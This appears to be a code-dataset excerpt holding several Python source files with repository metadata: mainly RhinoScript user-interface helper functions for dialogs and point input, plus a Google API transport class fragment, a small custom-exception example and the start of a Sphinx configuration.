and hasattr(service_account.Credentials, "with_always_use_jwt_access")
):
credentials = credentials.with_always_use_jwt_access(True)
# Save the credentials.
self._credentials = credentials
# TODO(busunkim): This method is in the base transport
# to avoid duplicating code across the transport classes. These functions
# should be deleted once the minimum required versions of google-auth is increased.
# TODO: Remove this function once google-auth >= 1.25.0 is required
@classmethod
def _get_scopes_kwargs(
cls, host: str, scopes: Optional[Sequence[str]]
) -> Dict[str, Optional[Sequence[str]]]:
"""Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
scopes_kwargs = {}
if _GOOGLE_AUTH_VERSION and (
packaging.version.parse(_GOOGLE_AUTH_VERSION)
>= packaging.version.parse("1.25.0")
):
scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
else:
scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}
return scopes_kwargs
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.search_migratable_resources: gapic_v1.method.wrap_method(
self.search_migratable_resources,
default_timeout=None,
client_info=client_info,
),
self.batch_migrate_resources: gapic_v1.method.wrap_method(
self.batch_migrate_resources,
default_timeout=None,
client_info=client_info,
),
}
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Return the client designed to process long-running operations."""
raise NotImplementedError()
@property
def search_migratable_resources(
self,
) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Union[
migration_service.SearchMigratableResourcesResponse,
Awaitable[migration_service.SearchMigratableResourcesResponse],
],
]:
raise NotImplementedError()
@property
def batch_migrate_resources(
self,
) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
]:
raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
| [
"[email protected]"
] | |
369763c0f219753bd8c6a490f0df5b72badcc7f3 | 4f730232e528083d868d92640443e0c327329ec6 | /scripts/rhinoscript/userinterface.py | ea6bb5de00e2c23f0600cd085af2986ca73deabc | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | matpapava/rhinopython | ad5aed71bba4c5554b8654f48a8c8054feb80c31 | 05a425c9df6f88ba857f68bb757daf698f0843c6 | refs/heads/master | 2021-05-29T12:34:34.788458 | 2015-06-08T11:58:43 | 2015-06-08T11:58:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,341 | py | import Rhino
import utility as rhutil
import scriptcontext
import System.Drawing.Color
import System.Enum
import System.Array
import System.Windows.Forms
import math
from view import __viewhelper
def BrowseForFolder(folder=None, message=None, title=None):
"""Display browse-for-folder dialog allowing the user to select a folder
Parameters:
folder[opt] = a default folder
message[opt] = a prompt or message
title[opt] = a dialog box title
Returns:
selected folder
None on error
"""
dlg = System.Windows.Forms.FolderBrowserDialog()
if folder:
if not isinstance(folder, str): folder = str(folder)
dlg.SelectedPath = folder
if message:
if not isinstance(message, str): message = str(message)
dlg.Description = message
if dlg.ShowDialog()==System.Windows.Forms.DialogResult.OK:
return dlg.SelectedPath
def CheckListBox(items, message=None, title=None):
"""Displays a list of items in a checkable-style list dialog box
Parameters:
items = a list of tuples containing a string and a boolean check state
message[opt] = a prompt or message
title[opt] = a dialog box title
Returns:
A list of tuples containing the input string in items along with their
new boolean check value
None on error
"""
checkstates = [item[1] for item in items]
itemstrs = [str(item[0]) for item in items]
newcheckstates = Rhino.UI.Dialogs.ShowCheckListBox(title, message, itemstrs, checkstates)
if newcheckstates:
rc = zip(itemstrs, newcheckstates)
return rc
return scriptcontext.errorhandler()
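# Usage sketch for CheckListBox (item names are illustrative):
#   items = [("Layer01", True), ("Layer02", False), ("Layer03", True)]
#   results = CheckListBox(items, "Check the layers to export")
#   if results:
#       checked = [name for name, state in results if state]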
def ComboListBox(items, message=None, title=None):
"""Displays a list of items in a combo-style list box dialog.
Parameters:
items = a list of string
      message[opt] = a prompt or message
title[opt] = a dialog box title
Returns:
The selected item if successful
None if not successful or on error
"""
return Rhino.UI.Dialogs.ShowComboListBox(title, message, items)
def EditBox(default_string=None, message=None, title=None):
"""Display dialog box prompting the user to enter a string value. The
string value may span multiple lines
"""
rc, text = Rhino.UI.Dialogs.ShowEditBox(title, message, default_string, True)
return text
def GetAngle(point=None, reference_point=None, default_angle_degrees=0, message=None):
"""Pause for user input of an angle
Parameters:
point(opt) = starting, or base point
reference_point(opt) = if specified, the reference angle is calculated
from it and the base point
default_angle_degrees(opt) = a default angle value specified
message(opt) = a prompt to display
Returns:
angle in degree if successful, None on error
"""
point = rhutil.coerce3dpoint(point)
if not point: point = Rhino.Geometry.Point3d.Unset
reference_point = rhutil.coerce3dpoint(reference_point)
if not reference_point: reference_point = Rhino.Geometry.Point3d.Unset
default_angle = math.radians(default_angle_degrees)
rc, angle = Rhino.Input.RhinoGet.GetAngle(message, point, reference_point, default_angle)
if rc==Rhino.Commands.Result.Success: return math.degrees(angle)
def GetBoolean(message, items, defaults):
"""Pauses for user input of one or more boolean values. Boolean values are
displayed as click-able command line option toggles
Parameters:
message = a prompt
items = list or tuple of options. Each option is a tuple of three strings
element 1 = description of the boolean value. Must only consist of letters
and numbers. (no characters like space, period, or dash
element 2 = string identifying the false value
element 3 = string identifying the true value
defaults = list of boolean values used as default or starting values
Returns:
a list of values that represent the boolean values if successful
None on error
"""
go = Rhino.Input.Custom.GetOption()
go.AcceptNothing(True)
go.SetCommandPrompt( message )
if type(defaults) is list or type(defaults) is tuple: pass
else: defaults = [defaults]
# special case for single list. Wrap items into a list
if len(items)==3 and len(defaults)==1: items = [items]
count = len(items)
if count<1 or count!=len(defaults): return scriptcontext.errorhandler()
toggles = []
for i in range(count):
initial = defaults[i]
item = items[i]
offVal = item[1]
t = Rhino.Input.Custom.OptionToggle( initial, item[1], item[2] )
toggles.append(t)
go.AddOptionToggle(item[0], t)
while True:
getrc = go.Get()
if getrc==Rhino.Input.GetResult.Option: continue
if getrc!=Rhino.Input.GetResult.Nothing: return None
break
return [t.CurrentValue for t in toggles]
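# Usage sketch for GetBoolean (option names are illustrative):
#   items = [("Delete", "No", "Yes"), ("Copy", "No", "Yes")]
#   results = GetBoolean("Choose options", items, [True, False])
#   if results:
#       delete_input, copy_input = results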
def GetBox(mode=0, base_point=None, prompt1=None, prompt2=None, prompt3=None):
"""Pauses for user input of a box
Parameters:
mode[opt] = The box selection mode.
0 = All modes
1 = Corner. The base rectangle is created by picking two corner points
2 = 3-Point. The base rectangle is created by picking three points
3 = Vertical. The base vertical rectangle is created by picking three points.
4 = Center. The base rectangle is created by picking a center point and a corner point
base_point[opt] = optional 3D base point
prompt1, prompt2, prompt3 [opt] = optional prompts to set
Returns:
list of eight Point3d that define the corners of the box on success
None is not successful, or on error
"""
base_point = rhutil.coerce3dpoint(base_point)
if base_point is None: base_point = Rhino.Geometry.Point3d.Unset
rc, box = Rhino.Input.RhinoGet.GetBox(mode, base_point, prompt1, prompt2, prompt3)
if rc==Rhino.Commands.Result.Success: return tuple(box.GetCorners())
def GetColor(color=[0,0,0]):
"""Display the Rhino color picker dialog allowing the user to select an RGB color
Parameters:
color [opt] = default RGB value. If omitted, the default color is black
Returns:
RGB tuple of three numbers on success
None on error
"""
color = rhutil.coercecolor(color)
if color is None: color = System.Drawing.Color.Black
rc, color = Rhino.UI.Dialogs.ShowColorDialog(color)
if rc: return color.R, color.G, color.B
return scriptcontext.errorhandler()
def GetCursorPos():
"""Retrieves the cursor's position
Returns: tuple containing the following information
cursor position in world coordinates
cursor position in screen coordinates
id of the active viewport
cursor position in client coordinates
"""
view = scriptcontext.doc.Views.ActiveView
screen_pt = Rhino.UI.MouseCursor.Location
client_pt = view.ScreenToClient(screen_pt)
viewport = view.ActiveViewport
xf = viewport.GetTransform(Rhino.DocObjects.CoordinateSystem.Screen, Rhino.DocObjects.CoordinateSystem.World)
world_pt = Rhino.Geometry.Point3d(client_pt.X, client_pt.Y, 0)
world_pt.Transform(xf)
return world_pt, screen_pt, viewport.Id, client_pt
def GetEdgeCurves(message=None, min_count=1, max_count=0, select=False):
"""Prompt the user to pick one or more surface or polysurface edge curves
Parameters:
message [optional] = A prompt or message.
min_count [optional] = minimum number of edges to select.
max_count [optional] = maximum number of edges to select.
select [optional] = Select the duplicated edge curves.
Returns:
List of (curve id, parent id, selection point)
None if not successful
"""
if min_count<0 or (max_count>0 and min_count>max_count): return
if not message: message = "Select Edges"
go = Rhino.Input.Custom.GetObject()
go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.Curve
go.GeometryAttributeFilter = Rhino.Input.Custom.GeometryAttributeFilter.EdgeCurve
go.EnablePreSelect(False, True)
rc = go.GetMultiple(min_count, max_count)
if rc!=Rhino.Input.GetResult.Object: return
rc = []
for i in range(go.ObjectCount):
edge = go.Object(i).Edge()
if not edge: continue
edge = edge.Duplicate()
curve_id = scriptcontext.doc.Objects.AddCurve(edge)
parent_id = go.Object(i).ObjectId
pt = go.Object(i).SelectionPoint()
rc.append( (curve_id, parent_id, pt) )
if select:
for item in rc:
rhobj = scriptcontext.doc.Objects.Find(item[0])
rhobj.Select(True)
scriptcontext.doc.Views.Redraw()
return rc
def GetInteger(message=None, number=None, minimum=None, maximum=None):
"""Pauses for user input of a whole number.
Parameters:
message [optional] = A prompt or message.
number [optional] = A default whole number value.
minimum [optional] = A minimum allowable value.
maximum [optional] = A maximum allowable value.
Returns:
The whole number input by the user if successful.
None if not successful, or on error
"""
gi = Rhino.Input.Custom.GetInteger()
if message: gi.SetCommandPrompt(message)
if number is not None: gi.SetDefaultInteger(number)
if minimum is not None: gi.SetLowerLimit(minimum, False)
if maximum is not None: gi.SetUpperLimit(maximum, False)
if gi.Get()!=Rhino.Input.GetResult.Number: return scriptcontext.errorhandler()
rc = gi.Number()
gi.Dispose()
return rc
def GetLayer(title="Select Layer", layer=None, show_new_button=False, show_set_current=False):
"""Displays dialog box prompting the user to select a layer
Parameters:
title[opt] = dialog box title
layer[opt] = name of a layer to preselect. If omitted, the current layer will be preselected
show_new_button, show_set_current[opt] = Optional buttons to show on the dialog
Returns:
name of selected layer if successful
None on error
"""
layer_index = scriptcontext.doc.Layers.CurrentLayerIndex
if layer:
index = scriptcontext.doc.Layers.Find(layer, True)
if index!=-1: layer_index = index
rc = Rhino.UI.Dialogs.ShowSelectLayerDialog(layer_index, title, show_new_button, show_set_current, True)
if rc[0]!=System.Windows.Forms.DialogResult.OK: return None
layer = scriptcontext.doc.Layers[rc[1]]
return layer.FullPath
def GetLayers(title="Select Layers", show_new_button=False):
"""Displays a dialog box prompting the user to select one or more layers
Parameters:
title[opt] = dialog box title
show_new_button[opt] = Optional button to show on the dialog
Returns:
The names of selected layers if successful
"""
rc, layer_indices = Rhino.UI.Dialogs.ShowSelectMultipleLayersDialog(None, title, show_new_button)
if rc==System.Windows.Forms.DialogResult.OK:
return [scriptcontext.doc.Layers[index].FullPath for index in layer_indices]
def GetLine(mode=0, point=None, message1=None, message2=None, message3=None):
"""Prompts the user to pick points that define a line
Parameters:
mode[opt] = line definition mode. See help file for details
point[opt] = optional starting point
message1, message2, message3 = optional prompts
Returns:
Tuple of two points on success
None on error
"""
gl = Rhino.Input.Custom.GetLine()
if mode==0: gl.EnableAllVariations(True)
else: gl.GetLineMode = System.Enum.ToObject( Rhino.Input.Custom.GetLineMode, mode-1 )
if point:
point = rhutil.coerce3dpoint(point)
gl.SetFirstPoint(point)
if message1: gl.FirstPointPrompt = message1
if message2: gl.MidPointPrompt = message2
    if message3: gl.SecondPointPrompt = message3
rc, line = gl.Get()
if rc==Rhino.Commands.Result.Success: return line.From, line.To
def GetMeshFaces(object_id, message="", min_count=1, max_count=0):
"""Prompts the user to pick one or more mesh faces
Parameters:
object_id = the mesh object's identifier
      message[opt] = a prompt or message
min_count[opt] = the minimum number of faces to select
max_count[opt] = the maximum number of faces to select. If 0, the user must
press enter to finish selection. If -1, selection stops as soon as there
are at least min_count faces selected.
Returns:
list of mesh face indices on success
None on error
"""
scriptcontext.doc.Objects.UnselectAll()
scriptcontext.doc.Views.Redraw()
object_id = rhutil.coerceguid(object_id, True)
def FilterById( rhino_object, geometry, component_index ):
return object_id == rhino_object.Id
go = Rhino.Input.Custom.GetObject()
go.SetCustomGeometryFilter(FilterById)
if message: go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.MeshFace
go.AcceptNothing(True)
if go.GetMultiple(min_count,max_count)!=Rhino.Input.GetResult.Object: return None
objrefs = go.Objects()
rc = [item.GeometryComponentIndex.Index for item in objrefs]
go.Dispose()
return rc
def GetMeshVertices(object_id, message="", min_count=1, max_count=0):
"""Prompts the user to pick one or more mesh vertices
Parameters:
object_id = the mesh object's identifier
      message[opt] = a prompt or message
min_count[opt] = the minimum number of vertices to select
max_count[opt] = the maximum number of vertices to select. If 0, the user must
press enter to finish selection. If -1, selection stops as soon as there
are at least min_count vertices selected.
Returns:
list of mesh vertex indices on success
None on error
"""
scriptcontext.doc.Objects.UnselectAll()
scriptcontext.doc.Views.Redraw()
object_id = rhutil.coerceguid(object_id, True)
class CustomGetObject(Rhino.Input.Custom.GetObject):
def CustomGeometryFilter( self, rhino_object, geometry, component_index ):
return object_id == rhino_object.Id
go = CustomGetObject()
if message: go.SetCommandPrompt(message)
go.GeometryFilter = Rhino.DocObjects.ObjectType.MeshVertex
go.AcceptNothing(True)
if go.GetMultiple(min_count,max_count)!=Rhino.Input.GetResult.Object: return None
objrefs = go.Objects()
rc = [item.GeometryComponentIndex.Index for item in objrefs]
go.Dispose()
return rc
def GetPoint(message=None, base_point=None, distance=None, in_plane=False):
"""Pauses for user input of a point.
Parameters:
message [opt] = A prompt or message.
base_point [opt] = list of 3 numbers or Point3d identifying a starting, or base point
      distance [opt] = constraining distance. If distance is specified, base_point must also
        be specified.
in_plane [opt] = constrains the point selections to the active construction plane.
Returns:
point on success
None if no point picked or user canceled
"""
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
base_point = rhutil.coerce3dpoint(base_point)
if base_point:
gp.DrawLineFromPoint(base_point,True)
gp.EnableDrawLineFromPoint(True)
if distance: gp.ConstrainDistanceFromBasePoint(distance)
if in_plane: gp.ConstrainToConstructionPlane(True)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPointOnCurve(curve_id, message=None):
"""Pauses for user input of a point constrainted to a curve object
Parameters:
curve_id = identifier of the curve to get a point on
      message [opt] = a prompt or message
Returns:
3d point if successful
None on error
"""
curve = rhutil.coercecurve(curve_id, -1, True)
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
gp.Constrain(curve, False)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPointOnMesh(mesh_id, message=None):
"""Pauses for user input of a point constrained to a mesh object
Parameters:
mesh_id = identifier of the mesh to get a point on
message [opt] = a prompt or message
Returns:
3d point if successful
None on error
"""
mesh_id = rhutil.coerceguid(mesh_id, True)
if not message: message = "Point"
cmdrc, point = Rhino.Input.RhinoGet.GetPointOnMesh(mesh_id, message, False)
if cmdrc==Rhino.Commands.Result.Success: return point
def GetPointOnSurface(surface_id, message=None):
"""Pauses for user input of a point constrained to a surface or polysurface
object
Parameters:
surface_id = identifier of the surface to get a point on
message [opt] = a prompt or message
Returns:
3d point if successful
None on error
"""
surfOrBrep = rhutil.coercesurface(surface_id)
if not surfOrBrep:
surfOrBrep = rhutil.coercebrep(surface_id, True)
gp = Rhino.Input.Custom.GetPoint()
if message: gp.SetCommandPrompt(message)
if isinstance(surfOrBrep,Rhino.Geometry.Surface):
gp.Constrain(surfOrBrep,False)
else:
gp.Constrain(surfOrBrep, -1, -1, False)
gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success:
return scriptcontext.errorhandler()
pt = gp.Point()
gp.Dispose()
return pt
def GetPoints(draw_lines=False, in_plane=False, message1=None, message2=None, max_points=None, base_point=None):
"""Pauses for user input of one or more points
Parameters:
draw_lines [opt] = Draw lines between points
in_plane[opt] = Constrain point selection to the active construction plane
message1[opt] = A prompt or message for the first point
message2[opt] = A prompt or message for the next points
max_points[opt] = maximum number of points to pick. If not specified, an
unlimited number of points can be picked.
base_point[opt] = a starting or base point
Returns:
list of 3d points if successful
None if not successful or on error
"""
gp = Rhino.Input.Custom.GetPoint()
if message1: gp.SetCommandPrompt(message1)
gp.EnableDrawLineFromPoint( draw_lines )
if in_plane:
gp.ConstrainToConstructionPlane(True)
plane = scriptcontext.doc.Views.ActiveView.ActiveViewport.ConstructionPlane()
gp.Constrain(plane, False)
getres = gp.Get()
if gp.CommandResult()!=Rhino.Commands.Result.Success: return None
prevPoint = gp.Point()
rc = [prevPoint]
if max_points is None or max_points>1:
current_point = 1
if message2: gp.SetCommandPrompt(message2)
def GetPointDynamicDrawFunc( sender, args ):
if len(rc)>1:
c = Rhino.ApplicationSettings.AppearanceSettings.FeedbackColor
args.Display.DrawPolyline(rc, c)
if draw_lines: gp.DynamicDraw += GetPointDynamicDrawFunc
while True:
if max_points and current_point>=max_points: break
if draw_lines: gp.DrawLineFromPoint(prevPoint, True)
gp.SetBasePoint(prevPoint, True)
current_point += 1
getres = gp.Get()
if getres==Rhino.Input.GetResult.Cancel: break
if gp.CommandResult()!=Rhino.Commands.Result.Success: return None
prevPoint = gp.Point()
rc.append(prevPoint)
return rc
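# Usage sketch for GetPoints: pick up to four points, drawing connecting
# lines while picking, then add a polyline through them.
#   points = GetPoints(draw_lines=True, message1="Pick the first point",
#                      message2="Pick the next point", max_points=4)
#   if points and len(points) > 1:
#       scriptcontext.doc.Objects.AddPolyline(points)
#       scriptcontext.doc.Views.Redraw()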
def GetReal(message="Number", number=None, minimum=None, maximum=None):
"""Pauses for user input of a number.
Parameters:
message [optional] = A prompt or message.
number [optional] = A default number value.
minimum [optional] = A minimum allowable value.
maximum [optional] = A maximum allowable value.
Returns:
The number input by the user if successful.
None if not successful, or on error
"""
gn = Rhino.Input.Custom.GetNumber()
if message: gn.SetCommandPrompt(message)
if number is not None: gn.SetDefaultNumber(number)
if minimum is not None: gn.SetLowerLimit(minimum, False)
if maximum is not None: gn.SetUpperLimit(maximum, False)
if gn.Get()!=Rhino.Input.GetResult.Number: return None
rc = gn.Number()
gn.Dispose()
return rc
def GetRectangle(mode=0, base_point=None, prompt1=None, prompt2=None, prompt3=None):
"""Pauses for user input of a rectangle
Parameters:
mode[opt] = The rectangle selection mode. The modes are as follows
0 = All modes
1 = Corner - a rectangle is created by picking two corner points
2 = 3Point - a rectangle is created by picking three points
3 = Vertical - a vertical rectangle is created by picking three points
4 = Center - a rectangle is created by picking a center point and a corner point
base_point[opt] = a 3d base point
prompt1, prompt2, prompt3 = optional prompts
Returns:
a tuple of four 3d points that define the corners of the rectangle
None on error
"""
mode = System.Enum.ToObject( Rhino.Input.GetBoxMode, mode )
base_point = rhutil.coerce3dpoint(base_point)
    if base_point is None: base_point = Rhino.Geometry.Point3d.Unset
prompts = ["", "", ""]
if prompt1: prompts[0] = prompt1
if prompt2: prompts[1] = prompt2
if prompt3: prompts[2] = prompt3
rc, corners = Rhino.Input.RhinoGet.GetRectangle(mode, base_point, prompts)
if rc==Rhino.Commands.Result.Success: return corners
return None
def GetString(message=None, defaultString=None, strings=None):
"""Pauses for user input of a string value
Parameters:
message [opt]: a prompt or message
defaultString [opt]: a default value
      strings [opt]: list of strings to be displayed as click-able command options.
        Note, strings cannot begin with a numeric character
    Returns:
      The string either entered by the user or the English name of the
      clicked command option if successful
      None if the user canceled
    """
gs = Rhino.Input.Custom.GetString()
gs.AcceptNothing(True)
if message: gs.SetCommandPrompt(message)
if defaultString: gs.SetDefaultString(defaultString)
if strings:
for s in strings: gs.AddOption(s)
result = gs.Get()
if result==Rhino.Input.GetResult.Cancel: return None
    if result == Rhino.Input.GetResult.Option:
return gs.Option().EnglishName
return gs.StringResult()
def ListBox(items, message=None, title=None, default=None):
"""Display a list of items in a list box dialog.
Parameters:
items = a list
      message [opt] = a prompt or message
title [opt] = a dialog box title
default [opt] = selected item in the list
Returns:
The selected item if successful
None if not successful or on error
"""
return Rhino.UI.Dialogs.ShowListBox(title, message, items, default)
def MessageBox(message, buttons=0, title=""):
"""Displays a message box. A message box contains a message and
title, plus any combination of predefined icons and push buttons.
Parameters:
message = A prompt or message.
buttons[opt] = buttons and icon to display. Can be a combination of the
following flags. If omitted, an OK button and no icon is displayed
0 Display OK button only.
1 Display OK and Cancel buttons.
2 Display Abort, Retry, and Ignore buttons.
3 Display Yes, No, and Cancel buttons.
4 Display Yes and No buttons.
5 Display Retry and Cancel buttons.
16 Display Critical Message icon.
32 Display Warning Query icon.
48 Display Warning Message icon.
64 Display Information Message icon.
0 First button is the default.
256 Second button is the default.
512 Third button is the default.
768 Fourth button is the default.
0 Application modal. The user must respond to the message box
before continuing work in the current application.
4096 System modal. The user must respond to the message box
before continuing work in any application.
title[opt] = the dialog box title
Returns:
A number indicating which button was clicked:
1 OK button was clicked.
2 Cancel button was clicked.
3 Abort button was clicked.
4 Retry button was clicked.
5 Ignore button was clicked.
6 Yes button was clicked.
7 No button was clicked.
"""
buttontype = buttons & 0x00000007 #111 in binary
btn = System.Windows.Forms.MessageBoxButtons.OK
if buttontype==1: btn = System.Windows.Forms.MessageBoxButtons.OKCancel
elif buttontype==2: btn = System.Windows.Forms.MessageBoxButtons.AbortRetryIgnore
elif buttontype==3: btn = System.Windows.Forms.MessageBoxButtons.YesNoCancel
elif buttontype==4: btn = System.Windows.Forms.MessageBoxButtons.YesNo
elif buttontype==5: btn = System.Windows.Forms.MessageBoxButtons.RetryCancel
icontype = buttons & 0x00000070
    # "None" is a .NET enum member but a Python keyword, so fetch it with getattr
    icon = getattr(System.Windows.Forms.MessageBoxIcon, "None")
if icontype==16: icon = System.Windows.Forms.MessageBoxIcon.Error
elif icontype==32: icon = System.Windows.Forms.MessageBoxIcon.Question
elif icontype==48: icon = System.Windows.Forms.MessageBoxIcon.Warning
elif icontype==64: icon = System.Windows.Forms.MessageBoxIcon.Information
defbtntype = buttons & 0x00000300
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button1
if defbtntype==256:
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button2
elif defbtntype==512:
defbtn = System.Windows.Forms.MessageBoxDefaultButton.Button3
if not isinstance(message, str): message = str(message)
dlg_result = Rhino.UI.Dialogs.ShowMessageBox(message, title, btn, icon, defbtn)
if dlg_result==System.Windows.Forms.DialogResult.OK: return 1
if dlg_result==System.Windows.Forms.DialogResult.Cancel: return 2
if dlg_result==System.Windows.Forms.DialogResult.Abort: return 3
if dlg_result==System.Windows.Forms.DialogResult.Retry: return 4
if dlg_result==System.Windows.Forms.DialogResult.Ignore: return 5
if dlg_result==System.Windows.Forms.DialogResult.Yes: return 6
if dlg_result==System.Windows.Forms.DialogResult.No: return 7
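# Usage sketch for MessageBox: combine the button and icon flags, e.g. Yes/No
# buttons (4) with a question icon (32); a return value of 6 means Yes.
#   if MessageBox("Save changes?", 4 | 32, "Confirm") == 6:
#       pass  # handle the Yes case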
def PropertyListBox(items, values, message=None, title=None):
"""Displays list of items and their values in a property-style list box dialog
Parameters:
items, values = list of string items and their corresponding values
message [opt] = a prompt or message
title [opt] = a dialog box title
Returns:
a list of new values on success
None on error
"""
values = [str(v) for v in values]
return Rhino.UI.Dialogs.ShowPropertyListBox(title, message, items, values)
def OpenFileName(title=None, filter=None, folder=None, filename=None, extension=None):
"""Displays file open dialog box allowing the user to enter a file name.
Note, this function does not open the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
      the file name if successful
None if not successful, or on error
"""
fd = Rhino.UI.OpenFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: return fd.FileName
def OpenFileNames(title=None, filter=None, folder=None, filename=None, extension=None):
"""Displays file open dialog box allowing the user to select one or more file names.
Note, this function does not open the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
list of selected file names
"""
fd = Rhino.UI.OpenFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
fd.MultiSelect = True
rc = []
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: rc = fd.FileNames
return rc
def PopupMenu(items, modes=None, point=None, view=None):
"""Displays a user defined, context-style popup menu. The popup menu can appear
almost anywhere, and it can be dismissed by either clicking the left or right
mouse buttons
Parameters:
items = list of strings representing the menu items. An empty string or None
will create a separator
modes[opt] = List of numbers identifying the display modes. If omitted, all
modes are enabled.
0 = menu item is enabled
1 = menu item is disabled
2 = menu item is checked
3 = menu item is disabled and checked
point[opt] = a 3D point where the menu item will appear. If omitted, the menu
will appear at the current cursor position
view[opt] = if point is specified, the view in which the point is computed.
If omitted, the active view is used
Returns:
index of the menu item picked or -1 if no menu item was picked
"""
screen_point = System.Windows.Forms.Cursor.Position
if point:
point = rhutil.coerce3dpoint(point)
view = __viewhelper(view)
viewport = view.ActiveViewport
point2d = viewport.WorldToClient(point)
screen_point = viewport.ClientToScreen(point2d)
    return Rhino.UI.Dialogs.ShowContextMenu(items, screen_point, modes)
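# Usage sketch for PopupMenu: None creates a separator; the second item is
# disabled (mode 1) and the last one is checked (mode 2).
#   index = PopupMenu(["Copy", "Paste", None, "Track"], [0, 1, 0, 2])
#   if index >= 0:
#       pass  # handle the picked menu item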
def RealBox(message="", default_number=None, title="", minimum=None, maximum=None):
"""Display a dialog box prompting the user to enter a number
Returns:
number on success
None on error
"""
if default_number is None: default_number = Rhino.RhinoMath.UnsetValue
if minimum is None: minimum = Rhino.RhinoMath.UnsetValue
if maximum is None: maximum = Rhino.RhinoMath.UnsetValue
rc, number = Rhino.UI.Dialogs.ShowNumberBox(title, message, default_number, minimum, maximum)
if rc==System.Windows.Forms.DialogResult.OK: return number
def SaveFileName(title=None, filter=None, folder=None, filename=None, extension=None):
"""Display a save dialog box allowing the user to enter a file name.
Note, this function does not save the file.
Parameters:
title[opt] = A dialog box title.
filter[opt] = A filter string. The filter must be in the following form:
"Description1|Filter1|Description2|Filter2||", where "||" terminates filter string.
If omitted, the filter (*.*) is used.
folder[opt] = A default folder.
filename[opt] = a default file name
extension[opt] = a default file extension
Returns:
      the file name if successful
None if not successful, or on error
"""
fd = Rhino.UI.SaveFileDialog()
if title: fd.Title = title
if filter: fd.Filter = filter
if folder: fd.InitialDirectory = folder
if filename: fd.FileName = filename
if extension: fd.DefaultExt = extension
if fd.ShowDialog()==System.Windows.Forms.DialogResult.OK: return fd.FileName
def StringBox(message=None, default_value=None, title=None):
"Display a dialog box prompting the user to enter a string value."
rc, text = Rhino.UI.Dialogs.ShowEditBox(title, message, default_value, False)
if rc!=System.Windows.Forms.DialogResult.OK: return None
return text
| [
"[email protected]"
] | |
6f2277101164e2fd6dac195e12949d3dca920dbe | 8fe9b8de265a1cf408dba15605e0e0c33a6931ee | /exceptions/define_exception.py | 1d94201250896bf695a200143de0ae758dc6c69c | [] | no_license | clivejan/python_object_oriented | d07346a2589fb630b2fd65d23ff2997c7e194b5d | 8f1ef1925630962c474b143607c056e8c2a1d7af | refs/heads/master | 2020-12-10T02:46:42.815508 | 2020-01-19T18:53:26 | 2020-01-19T18:53:26 | 233,484,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py | class InvalidWithdrawal(Exception):
pass
raise InvalidWithdrawal("Wake up! You don't have $50 in your account.")
| [
"[email protected]"
] | |
2f320639bf0c7b231d588ce8050002ed8d7f888e | eb52ecd946dc6c2e4d7bd63a27bbfbc587ccbe79 | /doc/source/conf.py | 7da23a679516396f631dd434f1640595a4a9aab4 | [
"Apache-2.0"
] | permissive | dtroyer/osc-choochoo | 5ee7b124b7c53c44aac5651dde950e11778e1653 | 57119ab84528933da9cbcd57dcd4f5b842a58186 | refs/heads/master | 2021-09-08T00:06:58.580823 | 2018-03-03T19:20:07 | 2018-03-03T19:36:37 | 103,709,841 | 1 | 1 | Apache-2.0 | 2018-03-03T13:28:05 | 2017-09-15T23:34:08 | Python | UTF-8 | Python | false | false | 2,903 | py | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import pbr.version
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..')))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'openstackdocstheme',
